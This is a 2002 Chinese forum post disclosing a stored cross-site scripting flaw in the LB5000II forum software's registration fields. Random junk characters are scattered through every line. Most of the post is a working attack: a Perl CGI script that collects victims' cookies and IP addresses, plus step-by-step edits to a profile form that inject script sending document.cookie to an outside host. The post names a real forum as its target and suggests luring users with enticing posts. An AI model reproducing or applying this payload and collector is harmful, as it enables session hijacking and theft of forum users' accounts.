漏洞描述:
( u0 t) Z" W+ m" ^6 ` LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新
) J) x6 J7 S/ ^5 U) d+ P5 G版本是LB5000II v20317b,可以http://www.leoboard.com下载。 7 M! Z0 G* l' C2 ~! x: ^& p3 U
其注册模块未过滤用户资料 最高学历:职业状况:等注册信息 $ m0 B( T. c' B2 i$ [% X. A& ^ F
导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript>
; O8 J" a4 H) I. U. |, d进行攻击,进一步可以通过某中方式收集。测试通过 Q. L3 x+ J/ V/ E. l: I- x
测试程序:
) O. J, O% m: R _ F- X 参考漏洞描述。 8 ]) L7 i9 ~# w! c
解决方案:
) v. t( V/ D% d" z N 对用户提交的资料进行过滤
2 t3 h' h+ B" Z% P9 {" \$ { 5 @8 A b. l( a/ l- {
$ z: c, u+ G- @* _
请在s8s8论坛访问
* n; y$ }# W! [, Y# Y [( ^http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队
7 b; M7 Q! J# [1 s4 A! K那么你在s8s8.net 的cookie将被我所获取. 9 i5 x0 ~' S* l& ~; S4 S" Y( n. D3 B
#!/usr/bin/perl * G( S# V5 [+ v' k" n5 Y3 _
#leo.cgi ' f# w2 M6 Q. Q* }
$url="http://www.s8s8.net";;
6 c: S1 b. W' ~9 x$method=$ENV{"REQUEST_METHOD"};
. E: v' d; ?* R) Xif(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};}
& z E7 G# j* `; pelse{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));}
' Q# {2 u* S7 v8 W$remote_addr=$ENV{"REMOTE_ADDR"}; 7 ] t: x( ]% o8 R' ?* q( X0 f) e: G
$buffer=~tr/+/ /;
: S! z, n6 M* f3 d% V5 H$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg; " z2 `) F% i( \) O% J' r$ c d
$buffer=$buffer."|$remote_addr\n";
, b/ c: u" } ?8 X' _1 `open(FILE,">>leo.txt"); - a' t. S; n4 J! i9 T
print FILE $buffer;
" h: B# c, c! c% y- bclose(FILE); 5 O8 I) ^' o( X; M: o, R4 o+ m
print "Location:$url\n\n";
d* \, G3 w# r9 [' u0 ?4 }上面是我的cookie收集脚本 9 V2 ~6 x$ v3 j
------------------------------------------------------------------------------ & Z U' _2 E6 e
范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试
( x( r- i. z5 Z( W用大刀队登陆s8s8论坛,编辑个人资料, - k( ~% o# X' I" ~
用记事本打开编辑网页 2 B7 \+ b6 a/ b3 t
<option value="中专">中专</option> 这一项改成 ' a( E$ [3 U/ C% b
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?'+documents.cookie)</s cript>">中专</option>
* s5 {+ H5 t* g: [& p8 i, W% g, y* q& B- R" T) L! S+ V' T
编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data"> - h6 Q7 g; q z R3 L4 M% c0 {
改为 9 N8 }7 Y/ R8 Z P0 j/ }9 t: O7 U
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data"> 5 }0 E5 i5 ~ l
保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据,
6 M2 r% U1 ^ j! K( I: I6 {" b) M% C这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。
2 V$ y% ^0 F5 x/ m为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击,
: X: S& S* n! {1 ^' [3 a h什么算诱惑力呢,自己发挥吧。
: q1 v6 m% g! ~ |
/1 
|Archiver|小黑屋|宽带技术网
|网站地图 
粤公网安备44152102000001号 
发表于 2002-6-6 11:05:22
发表于 2002-6-24 19:03:26